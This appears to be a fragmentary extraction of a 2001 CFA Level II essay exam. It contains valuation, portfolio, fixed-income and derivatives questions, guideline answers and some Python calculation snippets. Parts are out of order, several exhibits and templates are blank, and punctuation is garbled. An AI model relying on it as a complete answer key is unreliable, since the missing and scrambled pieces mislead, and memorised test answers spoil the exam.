A. i. The current market conversion price is $39.20.
Market conversion price = convertible bond’s market price / conversion ratio
= $980.00 / 25
= $39.20
ii. The expected one-year return for the Ytel convertible bond is 18.88%.
Expected return = ((end of year price + coupon) / current price) – 1
= (($1,125.00 + $40.00) / $980.00) – 1
= 0.18878
= 18.88%
iii. The expected one-year return for the Ytel common equity is 28.57%.
Expected return = (end of year price / current price) – 1
= ($45.00 / $35.00) – 1
= 0.28571
= 28.57%
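The three calculations above can be reproduced in a short script (a sketch of the arithmetic only; the variable names are ours, not AIMR's):

```python
# Sketch of the Ytel convertible-bond calculations in Question 16-A.
bond_price = 980.00        # convertible bond market price
conversion_ratio = 25
coupon = 40.00             # annual coupon
bond_price_end = 1125.00   # expected end-of-year bond price
stock_price = 35.00
stock_price_end = 45.00

market_conversion_price = bond_price / conversion_ratio           # part i
bond_return = (bond_price_end + coupon) / bond_price - 1          # part ii
stock_return = stock_price_end / stock_price - 1                  # part iii

print(f"{market_conversion_price:.2f}")  # 39.20
print(f"{bond_return:.4f}")              # 0.1888
print(f"{stock_return:.4f}")             # 0.2857
```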
B.
                          i. Increase in Ytel's       ii. Increase in
Component                 common equity price         interest rates
1. Straight value         Stay the same               Decrease
2. Option value           Increase                    Increase
Although not required to answer the question, the following explains the template entries:
The two components of the bond's value are straight value (its value as a bond) and option value (the value associated with the potential conversion into equity).
i. The increase in the equity price does not affect the straight value component of the Ytel convertible but does increase the call option component value significantly, because the call option becomes deep "in the money" when the $51.00 per share equity price is compared to the convertible's conversion price of $40.00 ($1,000.00 / 25) per share.
ii. The increase in interest rates decreases the straight value component (bond values decline as interest rates increase) of the convertible bond and increases the value of the equity call option component (call option values increase as interest rates increase), though this increase may be small or unnoticeable when compared to the change in the option value resulting from the increase in the equity price.
Association for
Investment Management
and Research
Post Office Box 3668
Charlottesville VA 22903-0668
USA
Tel: 804-951-5499
Identify: To establish the identity of; to show or prove the sameness of.
Indicate: To point out or point to with more or less exactness; to show or make known with a fair degree of certainty.
Total: 180
Exhibit 1-1
Fundamental Industry and Market Data
Forecasted Industry Earnings Retention Rate 40%
Forecasted Industry Return on Equity 25%
Industry Beta 1.2
Government Bond Yield 6%
Equity Risk Premium 5%
A. Compute the price-to-earnings (P0/E1) ratio for the industry based on the fundamental data in Exhibit 1-1. Show your work.
(4 minutes)
Jones wants to analyze how fundamental P/E ratios might differ among countries. He gathers the data given in Exhibit 1-2.
Exhibit 1-2
Economic and Market Data
Fundamental Factors                          Country A    Country B
Forecasted Growth in Real
  Gross Domestic Product (GDP)                   5%           2%
Government Bond Yield                           10%           6%
Equity Risk Premium                              5%           4%
B. Determine whether each of the fundamental factors in Exhibit 1-2 would cause P/E ratios to be generally higher for Country A or higher for Country B. Justify each of your conclusions with one reason.
Note: Consider each fundamental factor in isolation, with all else remaining equal.
(6 minutes)
Fundamental Factor
Determine whether
P/E ratios
Higher for Country A or
Higher for Country B
(Circle One)
Exhibit 2-1
Mackinac Inc.
Annual Income Statement
for the Year ended June 30, 2001
(in thousands, except per-share data)
Sales $250,000
Cost of Goods Sold 125,000
Gross Operating Profit $125,000
Selling, General, and Administrative Expenses 50,000
Earnings Before Interest, Taxes, Depreciation, and Amortization (EBITDA) $75,000
Depreciation and Amortization 10,500
Earnings Before Interest and Taxes (EBIT) $64,500
Interest Expense 11,000
Pretax Income $53,500
Income Taxes 16,050
Net Income $37,450
Shares Outstanding 13,000
Earnings Per Share (EPS) $2.88
Exhibit 2-2
Mackinac Inc.
Balance Sheet
as of June 30, 2001
(in thousands)
Current Assets:
Cash and Equivalents $20,000
Receivables 40,000
Inventories 29,000
Other Current Assets 23,000
Total Current Assets $112,000
Non-Current Assets:
Property, Plant, and Equipment $145,000
Less: Accumulated Depreciation (43,000)
Net Property, Plant, and Equipment $102,000
Investments 70,000
Other Non-Current Assets 36,000
Total Non-Current Assets $208,000
Total Assets $320,000
Current Liabilities:
Accounts Payable $41,000
Short Term Debt 12,000
Other Current Liabilities 17,000
Total Current Liabilities $70,000
Non-Current Liabilities:
Long Term Debt $100,000
Total Non-Current Liabilities $100,000
Total Liabilities $170,000
Shareholders' Equity:
Common Equity $40,000
Retained Earnings 110,000
Total Equity $150,000
Total Liabilities and Equity $320,000
Exhibit 2-3
Mackinac Inc.
Cash Flow Statement
for the Year ended June 30, 2001
(in thousands)
Note: Use June 30, 2001 year-end balance sheet data rather than averages in ratio
calculations.
(4 minutes)
B. Name each of the five components in the extended DuPont System and calculate a value for each component for Mackinac.
Note: Use June 30, 2001 year-end balance sheet data rather than averages in ratio
calculations.
(10 minutes)
Mackinac has announced that it has finalized an agreement to handle North American production of a successful product currently marketed by a foreign company. Jones decides to value Mackinac using the dividend discount model (DDM) and the free cash flow-to-equity (FCFE) model. After reviewing Mackinac's financial statements in Exhibits 2-1, 2-2, and 2-3 and forecasts related to the new production agreement, Jones concludes the following:
• Mackinac's earnings and FCFE are expected to grow 17 percent per year over the next three years before stabilizing at an annual growth rate of 9 percent.
• Mackinac will maintain the current payout ratio.
• Mackinac's beta is 1.25.
• The government bond yield is 6 percent and the market equity risk premium is 5 percent.
A. Calculate the value of a share of Mackinac's common stock using the two-stage DDM. Show your calculations.
(8 minutes)
B. Calculate the value of a share of Mackinac's common stock using the two-stage FCFE model. Show your calculations.
(8 minutes)
Jones is discussing with a corporate client the possibility of that client acquiring a 70 percent interest in Mackinac.
A. Discuss whether the dividend discount model (DDM) or free cash flow-to-equity (FCFE) model is more appropriate for this client's valuation purposes.
(3 minutes)
The proposed takeover could be hostile in nature, and both Jones and the client are concerned about possible defensive measures that Mackinac management might adopt to discourage the takeover. The client has asked Jones about the following:
B. Explain how each of these three measures could be used as a defense against a hostile takeover.
(6 minutes)
QUESTION 5 HAS TWO PARTS FOR A TOTAL OF 11 MINUTES.
Peninsular has another client who has inquired about the valuation method best suited for
comparison of companies in an industry that has the following characteristics:
Principal competitors within the industry are located in the United States, France,
Japan, and Brazil.
The industry is currently operating at a cyclical low, with many firms reporting losses.
The industry is subject to rapid technological change.
Jones recommends that the client consider the following valuation ratios:
1. Price-to-earnings
2. Price-to-book value
3. Price-to-sales
A. Determine which one of the three valuation ratios is most appropriate for comparing companies in this industry. Support your answer with two reasons that make that ratio superior to either of the other two ratios.
(5 minutes)
The client also has expressed interest in Economic Value Added (EVA®) as a measure of company performance. Jones asks his assistant to prepare a presentation about EVA for the client. The assistant's presentation includes the following statements:
1. EVA is a measure of a firm's excess shareholder value generated over a long period of time.
2. In calculating EVA, the cost of capital is the weighted average of the after-tax yield on long-term bonds with similar risk and the cost of equity as calculated by the capital asset pricing model.
Note: Explanations cannot repeat the statement in negative form, but must indicate what is needed to make the statement correct.
Answer Question 5-B in the Template provided on page 29.
(6 minutes)
Statement
Determine
whether
Correct or
Incorrect
(Circle One)
Correct
Incorrect
Correct
Incorrect
3. EVA provides a
consistent measure of
performance across firms.
Correct
Incorrect
Katherine Cooper is preparing a report on the optical network component business. She begins her research by analyzing the competitive conditions of the industry.
One of the dominant firms in the industry is Rubylight Inc. Exhibit 6-1 contains an excerpt from the President's Letter in the annual report.
Exhibit 6-1
Rubylight Inc.
2000 Annual Report
Excerpt from President's Letter
[1]Rubylight Inc. had an exceptional year in 2000. [2]The results in almost every corner of the business exceeded our expectations. [3]Sales at Rubylight climbed 73 percent over fiscal 1999 to $135 million, representing the strongest year-on-year sales growth in the company's history. [4]Our gross margin remained constant, compared to the prior year, at a respectable 67 percent. [5]We managed to maintain our margins, despite an increase in direct materials cost, through an improvement in product mix and price increases. [6]The capital markets have rewarded us for this superior financial performance; the company's stock price closed the year at an all time high. [7]We have an outstanding team here at Rubylight, deserving high praise for performance.
[17]On the competitive landscape, we have seen some interesting developments over the last year. [18]Our major competitor has focused on building distribution in the European market. [19]That competitor appears to be exiting North America and the Far East, which are our strongholds. [20]However, we have seen several start-ups enter the North American market. [21]They have been able to attract significant venture capital financing, which gives them greater ability to build brand recognition than start-ups have enjoyed in the past.
Name each of the competitive forces faced by Rubylight, using Porter's five-force model. Determine whether each competitive force is favorable or unfavorable for Rubylight. Select, for each competitive force, only two sentences from the President's Letter that support whether the competitive force is favorable or unfavorable for Rubylight.
Note: No sentence may be selected more than once; only the sentence reference numbers are needed for your selection.
(16 minutes)
Unfavorable
SAMPLE
5 and 8
Favorable
Unfavorable
Favorable
Unfavorable
Favorable
Unfavorable
Favorable
Unfavorable
Favorable
QUESTION 7 HAS ONE PART FOR A TOTAL OF 6 MINUTES.
Jeffrey Bruner, CFA, uses the capital asset pricing model (CAPM) to help identify mispriced securities. A consultant suggests Bruner use arbitrage pricing theory (APT) instead. In comparing CAPM and APT, the consultant made the following arguments:
1. Both the CAPM and APT require a mean–variance efficient market portfolio.
2. Neither the CAPM nor APT assumes normally distributed security returns.
3. The CAPM assumes that one specific factor explains security returns but APT does not.
Note: Indications cannot repeat the argument in negative form, but must indicate what is needed to make the argument correct.
(6 minutes)
Argument
State whether
Argument is
Correct or
Incorrect
(Circle One)
Incorrect
Incorrect
Incorrect
Abigail Grace has a $900,000 fully diversified portfolio. She subsequently inherits ABC Company common stock worth $100,000. Her financial advisor provided her with the forecasted information given in Exhibit 8-1.
Exhibit 8-1
Risk and Return Characteristics
                      Expected           Expected Standard Deviation
                      Monthly Returns    of Monthly Returns
Original Portfolio    0.67%              2.37%
ABC Company           1.25%              2.95%
The expected correlation coefficient of ABC stock returns with the original portfolio returns is 0.40.
The inheritance changes her overall portfolio and she is deciding whether or not to keep the ABC stock.
A. Calculate the:
i. expected return of her new portfolio that includes the ABC stock
ii. expected covariance of ABC stock returns with the original portfolio returns
iii. expected standard deviation of her new portfolio that includes the ABC stock
(6 minutes)
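Although the guideline answer for this part is not reproduced here, the standard portfolio arithmetic it calls for can be sketched as follows (the 0.9 and 0.1 weights follow from the $900,000/$100,000 market values; figures are in percent, as in Exhibit 8-1):

```python
# Sketch for Question 8-A: combining the original portfolio with ABC stock.
w_orig, w_abc = 0.9, 0.1            # weights from $900,000 / $100,000
r_orig, r_abc = 0.67, 1.25          # expected monthly returns, %
s_orig, s_abc = 2.37, 2.95          # monthly standard deviations, %
corr = 0.40                         # correlation with original portfolio

exp_return = w_orig * r_orig + w_abc * r_abc          # part i, % per month
cov = corr * s_orig * s_abc                           # part ii, %^2
variance = (w_orig * s_orig) ** 2 + (w_abc * s_abc) ** 2 + 2 * w_orig * w_abc * cov
std_dev = variance ** 0.5                             # part iii, % per month

print(round(exp_return, 3))   # 0.728
print(round(cov, 3))          # 2.797
print(round(std_dev, 2))      # 2.27
```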
If Grace sells the ABC stock, she will invest the proceeds in risk-free government securities yielding 0.42 percent monthly.
Assuming Grace sells the ABC stock and replaces it with the government securities,
B. Calculate the:
i. expected return of her new portfolio that includes the government securities
ii. expected covariance of the government security returns with the original portfolio
returns
iii. expected standard deviation of her new portfolio that includes the government securities
(6 minutes)
C. Determine whether the beta of her new portfolio that includes the government securities will be higher or lower than the beta of her original portfolio. Justify your response with one reason. No calculations are required.
(4 minutes)
Based on conversations with her husband, Grace is considering selling the $100,000 of ABC stock and acquiring $100,000 of XYZ Company common stock instead. XYZ stock has the same expected return and standard deviation as ABC stock. Her husband comments, "It doesn't matter whether you keep all of the ABC stock or replace it with $100,000 of XYZ stock."
(4 minutes)
In a recent discussion with her financial advisor, Grace commented, "If I just don't lose money in my portfolio, I will be satisfied." She went on to say, "I am more afraid of losing money than I am concerned about achieving high returns."
E. i. Describe one weakness of using expected standard deviation of returns as a risk measure for Grace.
ii. Identify one alternate risk measure that is more appropriate under the
circumstances and justify your response with one reason.
(6 minutes)
Buckner Industries has prepared the condensed forecast income statement for the year ending December 31, 2002, shown in Exhibit 9-1.
Exhibit 9-1
Buckner Industries
Condensed Forecast Income Statement
Year Ending December 31, 2002
(in thousands except for per share data)
After creating the forecast, Buckner develops a new product, which will require $100 million in additional capital expenditures at the beginning of 2002. With the new product, EBIT in 2002 is expected to be 15 percent higher than the amount forecast in Exhibit 9-1. To finance the increase in the capital budget, Buckner is considering a plan using 50 percent equity and 50 percent long-term debt. New equity would be issued at $25.00 net proceeds per share and the interest rate on the new long-term debt would be 8.50 percent. Buckner is reviewing how this financing, if completed on December 31, 2001, would affect the company's EPS.
A. Construct a pro forma income statement for 2002, assuming the financing plan is adopted.
(6 minutes)
Instead of using 50 percent equity and 50 percent long-term debt, Buckner decides to finance the entire capital budget increase by issuing $100 million in new long-term debt.
Jack Deven, a fixed income portfolio manager with LightStreet Investments, is concerned about the effect of such a large debt issuance on Buckner's credit quality and calculates selected pro forma financial credit quality ratios, shown in Exhibit 9-2 on page 50. LightStreet owns previously issued option-free Buckner bonds in its U.S. Corporate Bond portfolio. These bonds have a 10-year maturity and a modified duration of 6.5 years.
Deven wants to compare his recalculated credit ratios to LightStreet's credit quality standards, also shown in Exhibit 9-2. Buckner satisfied each of these credit quality standards prior to the new debt issue. For each standard no longer satisfied after the new debt issue, Deven believes the yield on the previously issued Buckner bonds will increase by 10 basis points.
Exhibit 9-2
Buckner Industries
LightStreet Credit Quality Standards and
Selected Pro Forma Financial Credit Quality Ratios
Financial Credit Quality Ratios
LightStreet
Credit Quality
Standards
Pro Forma Credit Quality
Ratios with Financing by
$100 Million Long-Term
Debt
Interest Coverage Ratio 4.00x 5.57x
Cash Flow from Operations (CFO)-to-Total Debt 0.50x 0.44x
Pretax Return on Total Capital 18% 22%
Pretax Income-to-Sales 28% 33%
Total Debt-to-Total Capital 50% 54%
B. i. Identify the ratios that would contribute to an increase in the total yield on the previously issued Buckner bonds if Deven's analysis is correct.
ii. Calculate the direction and magnitude of the percentage price change due to the change in yield.
(4 minutes)
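Part ii rests on the duration approximation: percent price change ≈ −modified duration × change in yield. A sketch, assuming Deven's 10 basis points per failed standard and that two of the Exhibit 9-2 standards (CFO-to-total debt at 0.44x versus 0.50x, and total debt-to-total capital at 54% versus 50%) are no longer met:

```python
# Sketch for Question 9-B-ii: duration approximation of the price change.
modified_duration = 6.5
failed_standards = 2                        # assumption: two ratios fail
yield_change = failed_standards * 0.0010    # 10 bps per failed standard

# Percent price change ≈ -modified duration × yield change.
pct_price_change = -modified_duration * yield_change
print(f"{pct_price_change:.2%}")   # -1.30%
```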
Rajiv Singh, a bond analyst, is examining the risk and return characteristics of mortgage pass-through securities.
A. Describe each of the two prepayment risks for a mortgage pass-through security and relate each risk to changes in interest rates.
(4 minutes)
Exhibit 10-1
Option-Adjusted Spread (OAS) Output from a Monte Carlo Simulation of Two CMO Tranches
(15% annual volatility)
Tranche   OAS (bps)   Option Cost (bps)   Z Spread (bps)   Effective Duration (Years)
I         108         28                  136              2.5
II        76          99                  175              2.5
B. Identify which CMO tranche is less expensive on a relative value basis and justify your response.
(4 minutes)
Singh is also analyzing a convertible bond. The characteristics of the bond and the underlying common stock are given in Exhibit 11-1:
Exhibit 11-1
Convertible Bond and Underlying Stock Characteristics
Convertible Bond Characteristics
Par Value $1,000
Annual Coupon Rate (annual pay) 6.5%
Conversion Ratio 22
Market Price 105% of par value
Straight Value 99% of par value
Underlying Stock Characteristics
Current Market Price $40 per share
Annual Cash Dividend $1.20 per share
i. Conversion value
ii. Market conversion price
iii. Premium payback period
(6 minutes)
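The textbook convertible-bond formulas applied to Exhibit 11-1 can be sketched as follows (an illustration of the standard definitions, not the official guideline answer):

```python
# Sketch of the convertible-bond calculations from Exhibit 11-1.
par = 1000.0
coupon = 0.065 * par               # $65 annual coupon (6.5%, annual pay)
conversion_ratio = 22
bond_price = 1.05 * par            # market price, 105% of par
stock_price = 40.0
dividend = 1.20                    # annual cash dividend per share

conversion_value = conversion_ratio * stock_price           # part i
market_conversion_price = bond_price / conversion_ratio     # part ii
premium_per_share = market_conversion_price - stock_price
# Favorable income differential per share = (coupon - forgone dividends) / ratio.
income_diff = (coupon - conversion_ratio * dividend) / conversion_ratio
premium_payback = premium_per_share / income_diff           # part iii, years

print(round(conversion_value, 2))          # 880.0
print(round(market_conversion_price, 2))   # 47.73
print(round(premium_payback, 2))           # 4.4
```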
(6 minutes)
An increase in
stock price
volatility
Increase
Decrease
Remain Unchanged
An increase in
interest rate
volatility
Increase
Decrease
Remain Unchanged
Noah Kramer, a fixed income portfolio manager based in the country of Sevista, is considering the purchase of a Sevista government bond. The Sevista government is issuing new 25-year maturity debt in an amount equal to one-fourth of the total Sevista government debt outstanding.
The proceeds from the new debt issue will be used to retire an equal amount of existing 5-year maturity government debt. Prior to the new issue, total outstanding debt of the Sevista government is evenly distributed among 5-, 15-, and 25-year maturities.
A. Indicate how the Sevista government bond yield curve is likely to change as a result of the new 25-year maturity debt issue. Support your answer using the Preferred Habitat Theory of the term structure of interest rates.
(4 minutes)
Kramer decides to evaluate two strategies for implementing his investment in Sevista bonds. Exhibit 12-1 gives the details of the two strategies, and Exhibit 12-2 contains the assumptions that apply to both strategies.
Exhibit 12-1
Investment Strategies
(Amounts are Market Value Invested)
            5 Year Maturity         15 Year Maturity        25 Year Maturity
Strategy    (Modified Duration      (Modified Duration      (Modified Duration
            = 4.83)                 = 14.35)                = 23.81)
I           $5 million              0                       $5 million
II          0                       $10 million             0
Exhibit 12-2
Investment Strategy Assumptions
Market Value of Bonds $10 million
Bond Maturities 5 and 25 years
or
15 years
Bond Coupon Rates 0.00%
Target Modified Duration 15 years
Before choosing one of the two bond investment strategies, Kramer wants to analyze how the market value of the bonds will change if an instantaneous interest rate shift occurs immediately after his investment. The details of the interest rate shift are shown in Exhibit 12-3.
Exhibit 12-3
Instantaneous Interest Rate Shift
Immediately After Investment
Key Rate Maturity    Key Rate Change
5 Year               Down 75 basis points (bps)
15 Year              Up 25 bps
25 Year              Up 50 bps
B. Calculate, for the instantaneous interest rate shift shown in Exhibit 12-3, the percent change in the market value of the bonds that will occur under:
i. Strategy I
ii. Strategy II
(6 minutes)
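The calculation asked for in part B can be sketched with the duration approximation (percent change ≈ −modified duration × key-rate change, value-weighted across positions); this is an illustration under that approximation, not the official guideline answer:

```python
# Sketch for Question 12-B: value change under the Exhibit 12-3 key-rate shifts.
shifts = {5: -0.0075, 15: 0.0025, 25: 0.0050}    # key-rate changes
durations = {5: 4.83, 15: 14.35, 25: 23.81}      # modified durations

strategy1 = {5: 5.0, 15: 0.0, 25: 5.0}     # barbell: $5M in 5s, $5M in 25s
strategy2 = {5: 0.0, 15: 10.0, 25: 0.0}    # bullet: $10M in 15s

def pct_change(weights):
    # Value-weighted sum of -duration × key-rate shift for each position.
    total = sum(weights.values())
    return sum(w * -durations[m] * shifts[m] for m, w in weights.items()) / total

print(f"{pct_change(strategy1):.2%}")   # -4.14%
print(f"{pct_change(strategy2):.2%}")   # -3.59%
```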
Euros (€), or U.S. dollars, accompanied by a combined interest rate and currency swap.
A. Explain one risk World would assume by entering into the combined interest rate and currency swap.
(4 minutes)
Bishop believes that issuing the U.S. dollar debt and entering into the swap can lower World's cost of debt by 45 basis points. Immediately after selling the debt issue, World would swap the U.S. dollar payments for Euro payments throughout the maturity of the debt. She assumes a constant currency exchange rate throughout the tenor of the swap.
Exhibit 13-1 gives details for the two alternative debt issues. Exhibit 13-2 provides current information about spot currency exchange rates and the 3-year tenor Euro/U.S. Dollar currency and interest rate swap.
Exhibit 13-1
World Telephone Debt Details
Characteristic Euro Currency Debt U.S. Dollar Currency Debt
Par Value €3.33 billion $3 billion
Term to Maturity 3 Years 3 Years
Fixed Interest Rate 6.25% 7.75%
Interest Payment Annual Annual
Exhibit 13-2
Currency Exchange Rate and Swap Information
Spot currency exchange rate $0.90 per Euro ($0.90/€1.00)
3-year tenor Euro/U.S. Dollar
fixed interest rates
Note: Your response should show both the correct currency ($ or €) and amount for each cash flow.
(12 minutes)
C. State whether or not World would reduce its borrowing cost by issuing the debt denominated in U.S. dollars, accompanied by the combined interest rate and currency swap. Justify your response with one reason.
(6 minutes)
Donna Doni, CFA, wants to explore potential inefficiencies in the futures market. The TOBEC stock index has a spot value of 185.00 now. TOBEC futures contracts are settled in cash and underlying contract values are determined by multiplying $100 times the index value. The current annual risk-free interest rate is 6.0 percent.
A. Calculate the theoretical price of the futures contract expiring six months from now, using the cost-of-carry model. Show your calculations.
(4 minutes)
The total (round-trip) transaction cost for trading a futures contract is $15.00.
B. Calculate the lower bound for the price of the futures contract expiring six months from now. Show your calculations.
(6 minutes)
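Both parts follow from the cost-of-carry model F = S(1 + r)^t, with the lower bound adjusted for the round-trip transaction cost. A sketch (no dividend yield is given in the question, so none is assumed):

```python
# Sketch for Question 14: cost-of-carry futures pricing for the TOBEC index.
spot = 185.00
r = 0.06                   # annual risk-free rate
t = 0.5                    # six months
multiplier = 100.0         # dollars per index point
round_trip_cost = 15.00    # dollars per contract

# Part A: theoretical futures price, F = S(1 + r)^t.
theoretical_price = spot * (1 + r) ** t
# Part B: arbitrage is unprofitable within transaction costs, so the
# no-arbitrage lower bound is the theoretical price less the cost per index point.
lower_bound = theoretical_price - round_trip_cost / multiplier

print(round(theoretical_price, 2))   # 190.47
print(round(lower_bound, 2))         # 190.32
```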
1. Write your candidate number in the spaces provided on the front cover of this Essay examination book.
2. Complete and sign the pledge attached to the front cover of this examination book. Your examination will not be graded unless the pledge is signed. The pledge will be detached prior to grading.
3. Write your answers in blue or black ink on the designated answer pages in the examination book.
5. Use only the Texas Instruments BAII Plus or the Hewlett Packard 12C calculator. All other calculators will be confiscated and a report will be submitted to AIMR.
6. Only answers written on the correct answer pages will be graded. You may make marks and notes on the question pages, but these marks will not be graded.
7. If you use all of the designated pages, check the box at the bottom of the last page of your answer and continue your answer on the unnumbered extra pages at the back of the examination book. Label extra pages with the correct question number.
8. You must stop writing immediately when instructed to do so at the conclusion of the examination.
Reading Reference:
"Price/Earnings Multiples," Ch. 14, Investment Valuation: Tools and Techniques for Determining the Value of Any Asset, Aswath Damodaran (Wiley, 1996)
Purpose:
To test the candidate's: 1) understanding of industry and country price/earnings multiples, and 2) ability to calculate values for those multiples.
Guideline Answer:
A. The industry's estimated P/E can be computed using the following model:
P0/E1 = payout ratio / (r − g)
However, because r and g are not explicitly given, they must be computed using the following formulas:
g = earnings retention rate × ROE
r = government bond yield + (beta × equity risk premium)
Therefore:
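The computation, which is not fully reproduced above, can be sketched from the Exhibit 1-1 inputs (an illustration of the model, not the official guideline figures):

```python
# Sketch of the Question 1-A computation using the Exhibit 1-1 data:
# P0/E1 = payout / (r - g), with g = retention x ROE and CAPM r.
retention = 0.40       # forecasted industry earnings retention rate
roe = 0.25             # forecasted industry return on equity
beta = 1.2             # industry beta
bond_yield = 0.06      # government bond yield
risk_premium = 0.05    # equity risk premium

g = retention * roe                      # sustainable growth rate
r = bond_yield + beta * risk_premium     # CAPM required return
payout = 1 - retention
pe = payout / (r - g)

print(round(g, 2))    # 0.1
print(round(r, 2))    # 0.12
print(round(pe, 1))   # 30.0
```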
B.
Fundamental Factor
Determine whether
P/E ratios
Higher for Country A or
Higher for Country B
(Circle One)
Reading References:
1. "Managing Growth," Ch. 4, Analysis for Financial Management, 5th or 6th edition, Robert C. Higgins (Irwin, 1998 or 2000)
2. "Analysis of Financial Statements," Ch. 12, Investment Analysis and Portfolio Management, 5th edition, Frank K. Reilly and Keith C. Brown (Dryden, 1997)
Purpose:
To test the candidate's ability to calculate: 1) a company's sustainable growth rate, and 2) the financial ratios that comprise the extended DuPont System.
Guideline Answer:
A. Sustainable growth rate = return on equity × earnings retention rate
= ($37,450 / $150,000) × (1 − ($22,470 / $37,450))
= 24.97% × 0.40
= 9.99%
2001 Level II Guideline Answers
Morning Section - Page 4
B.
Component                                                       Value
Operating Profit Margin (EBIT / Sales)                          0.258
Total Asset Turnover (Sales / Total Assets)                     0.781
Interest Expense Rate (Interest Expense / Total Assets)         0.034
Financial Leverage Multiplier (Total Assets / Equity)           2.133
Tax Retention Rate [100% − (Income Tax / EBT)]                  0.700
Note: Although not part of the guideline answer, the components shown above may be used in the following formula to compute return on equity (ROE):
ROE = [(Operating Profit Margin × Total Asset Turnover) − Interest Expense Rate] × Financial Leverage Multiplier × Tax Retention Rate
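The five components and the ROE cross-check can be verified in a few lines (a sketch using the Exhibit 2-1 and 2-2 figures; variable names are ours):

```python
# Sketch of the extended DuPont components for Mackinac (Exhibits 2-1, 2-2).
ebit, sales = 64_500, 250_000
interest, total_assets = 11_000, 320_000
equity, taxes, pretax = 150_000, 16_050, 53_500

op_margin = ebit / sales                       # 0.258
asset_turnover = sales / total_assets          # 0.781
interest_rate = interest / total_assets        # 0.034
leverage = total_assets / equity               # 2.133
tax_retention = 1 - taxes / pretax             # 0.700

# Extended DuPont ROE, which should equal net income / equity.
roe = ((op_margin * asset_turnover) - interest_rate) * leverage * tax_retention
print(round(roe, 3))   # 0.25, matching net income / equity = 37,450 / 150,000
```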
Reading Reference:
Investment Valuation: Tools and Techniques for Determining the Value of Any Asset, Aswath Damodaran (Wiley, 1996)
A. "Dividend Discount Models," Ch. 10
B. "Free Cashflows to Equity Discount Models," Ch. 11
Purpose:
To test the candidate's ability to calculate the value of a company's equity using: 1) the two-stage dividend discount model, and 2) the two-stage free cash flow model.
Guideline Answer:
A. Using a two-stage dividend discount model, the value of a share of Mackinac is calculated as follows:
Cost of Equity (r) = Long Bond Rate + (Beta × Equity Risk Premium)
= 0.06 + (1.25 × 0.05) = 0.1225 or 12.25%
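The remainder of the two-stage DDM calculation, which is not reproduced above, can be sketched as follows. The 60 percent payout ratio is an inference from Exhibit 2-1 (EPS of $2.88) and the $22,470 of dividends used in Question 2; treat it, and the resulting value, as an illustration rather than the official guideline figure:

```python
# Sketch of the two-stage DDM for Question 3-A.
eps0 = 2.88
payout = 0.60                   # assumption: implied by $22,470 / $37,450
g_high, g_stable = 0.17, 0.09   # 3 years at 17%, then 9% forever
r = 0.06 + 1.25 * 0.05          # CAPM cost of equity = 12.25%

d0 = eps0 * payout
dividends = [d0 * (1 + g_high) ** t for t in (1, 2, 3)]
# Terminal value at the end of year 3, using the stable-growth Gordon model.
terminal = dividends[-1] * (1 + g_stable) / (r - g_stable)

value = sum(d / (1 + r) ** t for t, d in enumerate(dividends, start=1))
value += terminal / (1 + r) ** 3
print(round(value, 2))   # about 71.26 per share
```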
Reading References:
1. Investment Valuation: Tools and Techniques for Determining the Value of Any Asset, Aswath Damodaran (Wiley, 1996)
A. "Dividend Discount Models," Ch. 10
B. "Free Cashflows to Equity Discount Models," Ch. 11
2. "Mergers, LBOs, Divestitures, and Holding Companies," Ch. 21, Fundamentals of Financial Management, 8th edition, Eugene F. Brigham and Joel F. Houston (Dryden, 1998)
Purpose:
To test the candidate's: 1) ability to determine the valuation model that is most appropriate given a specific company's circumstances, and 2) understanding of different measures that can be used against a hostile takeover.
Guideline Answer:
A. The FCFE model is best for valuing firms for takeovers or where there is a reasonable chance of changing corporate control. Because controlling stockholders can change the dividend policy, they are interested in estimating the maximum residual cash flow after meeting all financial obligations and investment needs. The dividend discount model is based upon the premise that the only cash flows received by stockholders are dividends. FCFE uses a more expansive definition to measure what a firm can afford to pay out as dividends.
B. Employee Stock Ownership Plans (ESOP): A large block of stock in an ESOP (either existing or recently created) is likely to vote in support of management positions and therefore make an unwanted takeover more difficult.
Stock purchase rights: Such rights are a type of "poison pill" that give current stockholders the right to purchase, at bargain prices, either new stock in their company or stock in the acquiring company when a hostile potential acquirer purchases a certain percentage of the stock of their company. This makes the purchase price higher, reducing the likelihood of an unwanted takeover.
Golden parachute: Golden parachutes are large payments to specified current managers; such payments are triggered only by the purchase of the firm, thereby materially increasing the acquisition expense to the buyer and reducing the likelihood of an unwanted takeover.
Reading References:
1. Investment Valuation: Tools and Techniques for Determining the Value of Any Asset, Aswath Damodaran (Wiley, 1996)
A. "Price/Book Value Multiples," Ch. 15
B. "Price/Sales Multiples," Ch. 16
2. Company Performance and Measures of Value Added, pp. 1-47, Pamela P. Peterson and David R. Peterson (Research Foundation of the ICFA, 1997)
3. "An Analysis of EVA®," Richard Bernstein and Carmen Pigler, Quantitative Viewpoint (Merrill Lynch, 19 December 1997)
Purpose:
To test the candidate.s: 1) understanding of differences among valuation approaches, 2)
ability to
determine the appropriateness of using a specified valuation approach, and 3)
understanding of
alternative performance measurement and valuation methods.
More useful in valuing companies with negative earnings or negative book values (a
frequent consequence of rapid technological change)
Better able to compare companies in different countries that are likely to be using
different accounting methods, i.e., standards (a consequence of the multinational nature
of the industry)
Less subject to manipulation, i.e., managing earnings by management (a frequent
consequence when firms are in a cyclical low and likely to report losses)
Not as volatile as PE multiples and hence may be more reliable for use in valuation
Less subject to distortion from currency translation effects
Less influenced by accounting values in the presence of rapid technological change
2001 Level II Guideline Answers
Morning Section . Page 11
B.
Statement
Determine
whether
Correct or
Incorrect
(Circle One)
Incorrect
EVA is a measure of economic profit. Such a
measure may or may not have also generated
.excess shareholder value..
EVA is a measure of value added by the firm.s
management during a period.
2. In calculating EVA, the
cost of capital is the
weighted average of the
after-tax yield on long-
term bonds with similar
risk and the cost of
equity as calculated by
the capital asset pricing
model.
Correct
3. EVA provides a
consistent measure of
performance across
firms.
Incorrect
Size of the firm, for example, affects
EVA/MVA. The measure also requires
estimates of cost of capital and other
components of the calculation. It is, therefore,
anything but straightforward and not
necessarily consistent across firms.
Accounting standards, methods, practices, and
decisions result in differences.
Reading References:
1. .Competitive Strategy: The Core Concepts,. Michael E. Porter, Competitive
Advantage:
Creating and Sustaining Superior Performance (The Free Press, 1985)
2. .Industry Analysis,.Ch.6, Security Analysis on Wall Street: A
Comprehensive Guide to
Today.s Valuation Methods, Jeffrey C. Hooke (Wiley, 1998)
Purpose:
To test the candidate.s understanding of the competitive forces that affect the profitability
of a
company.
Reading Reference:
Investment Analysis and Portfolio Management, 5th edition, Frank K. Reilly
and Keith C. Brown
(Dryden, 1997)
A. .An Introduction to Asset Pricing Models,. Ch. 9
B. .Extensions and Testing of Asset Pricing Theories,. Ch. 10
